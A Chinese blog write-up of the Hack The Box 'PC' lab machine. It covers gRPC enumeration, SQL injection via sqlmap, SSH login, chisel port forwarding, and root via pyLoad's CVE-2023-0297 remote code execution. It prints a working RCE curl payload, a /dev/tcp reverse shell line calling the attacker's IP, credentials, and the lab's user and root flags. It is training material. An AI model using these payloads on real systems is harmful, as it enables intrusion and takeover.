HTB PC靶机渗透测试流程

最新推荐文章于 2024-05-11 11:36:26 发布
最新推荐文章于 2024-05-11 11:36:26 发布
阅读量267 收藏
点赞数
文章标签: 网络 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/132190332
版权

靶机介绍

来源:Hack The Box        靶机难度:Easy


信息收集

 

端口扫描

可以发现开放了两个端口,22和50051

sudo nmap -sT --min-rate 10000 -p- 10.10.11.214

版本探测

可以发现22端口版本为OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)

50051仍然无法得知版本号

初步判断操作系统为Ubuntu Linux

sudo nmap -sU --top-ports 100 10.10.11.214

 

UDP扫描

没有新的发现

sudo nmap -sU --top-ports 100 10.10.11.214

 谷歌搜寻信息

通过谷歌搜索得知50051可能是gRPC服务的默认端口号

渗透流程

使用grpcui创建webui

你也可以用grpcurl如果你更喜欢用命令行操作的话

./grpcui -plaintext 10.10.11.214:50051

下载地址

grpcui             grpcurl

 

SQL注入

使用registerUser注册一个账户

 登录获取ID和TOKEN

ID=187
token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVhcmRyb3AiLCJleHAiOjE2OTE1NzkyNzJ9.AifFDaFQ20KOlX6A8_PN86yHoLJGkPw9A51xq9JRA88

 正常getinfo可以成功

尝试在id那里添加一个引号 发现报错了,可能存在SQL注入

 

 使用Sqlmap爆破数据库,拿到用户名密码

sudo sqlmap -r sql --level 5 --risk 3 --dump --batch

 SSH登录

使用账户名sau密码HereIsYourPassWord1431
成功登录到目标靶机

获取user.txt

文件在家目录下

d11969f0ac61815bc832c267d1a90921

 

权限提升

发现可疑端口进程

使用netstat发现开放了8000端口,同时在opt目录下发现app的源码,并且该app是以root权限运行的。

 

 

端口转发

使用chisel进行端口转发
 

./chisel server -p 3477 --reverse # kali机
./chisel client 10.10.14.3:3477 R:8000:127.0.0.1:8000/tcp # 靶机

本地访问 

 访问127.0.0.1:8000发现是pyLoad,通过对比软件源码和谷歌搜寻得知该版本存在远程命令执行漏洞。CVE-2023-0297

 漏洞利用

kali开启监听

sudo python3 -m http.server 7777

准备payload

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"bash%20/home/sau/shell.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:8000/flash/addcrypted2'

编写反弹shell.sh,并上传到靶机

sh -i >& /dev/tcp/10.10.14.3/7777 0>&1

 执行获取反弹shell

 获取root.txt

171712d7a82bea4a8b035f94a9293ff4

总结

通过50051的grpc端口服务,配合grpcui得知存在SQL注入漏洞,利用sqlmap获取到用户,并成功登录到ssh,最后利用pyLoad的远程命令执行漏洞getshell并提权。

Teardrop、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
HTB单线策略测试
08-18
HTB单线策略测试,
HTB PC
qq_64201116的博客
05-30 1588
链接:https://qing3feng.github.io/2023/05/29/HTB%20PC/今天又学一招,配置好/etc/hosts​文件:​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YHXRNj1I-1685406194714)(https://qing3feng.github.io/Blogimages/HTB_PC/image-20230529093245-pwj2tjw.png)]​如图所示,这样子就可以直接ping pc​了,不用再​。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7339
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
最新发布
2401_84563933的博客
05-11 342
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
看完这篇 教你玩转渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 3788
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
grpc工具之grpcurl、grpcui、ghz
weixin_38155824的博客
06-15 905
(window这样执行会报错:Error invoking method “pb.Order/login”: error getting request data: invalid character ‘u’ looking for beginning of object key string)2、在注册服务之后,启动反射服务:reflection.Register(rpcServer)1、安装grpcurl。
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2705
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
HTB打靶日记:Stocker
01-15
hackthebox
java开发得oa系统源码-Pentest:渗透测试
06-05
此页面上描述的工具技术和程序应仅用于经批准的渗透测试、CTF 和其他合法黑客挑战网站。 与本网站所含材料相关的任何行为或活动均由用户自行负责,网站所有者与此无关。 如果任何个人滥用其中包含的信息以违反法律而...
htb
03-11
相关项目。
渗透测试-靶机打靶思路与方法
lza20001103的博客
08-18 3952
渗透测试-靶机打靶思路与方法 文章目录渗透测试-靶机打靶思路与方法一.对靶机进行信息收集1.首先对目标存活靶机发起嗅探:2.对目标主机开放端口及服务发起探测3.对非web端口的服务发起迅速的嗅探,尝试使用nday进行攻击4.开始进行web端口外部打点尝试二.一些靶机打点的工具和知识三.进行linux下的提权四.总结 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: ①sudo arp-scan -l 针对网卡发起扫描存活主机 ②arping扫描:for i in (seq 1 254);do arp
综合靶机渗透测试解析
w_j_x_123的博客
05-30 488
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
对DC-1靶机进行渗透测试
zll___的博客
03-11 900
对DC-1靶机进行渗透测试
DC-4靶机渗透测试
读书 买花 长大
04-18 730
DC-4
htb pc wp
mikumiku~
06-03 504
htb pc wp
DC-9靶机渗透测试
读书 买花 长大
05-21 507
DC-9
看完这篇 教你玩转渗透测试靶机Vulnhub——Hms?1
Aluxian_的博客
11-27 427
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy (简单的)1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入 渗透的流程思路🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1723
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值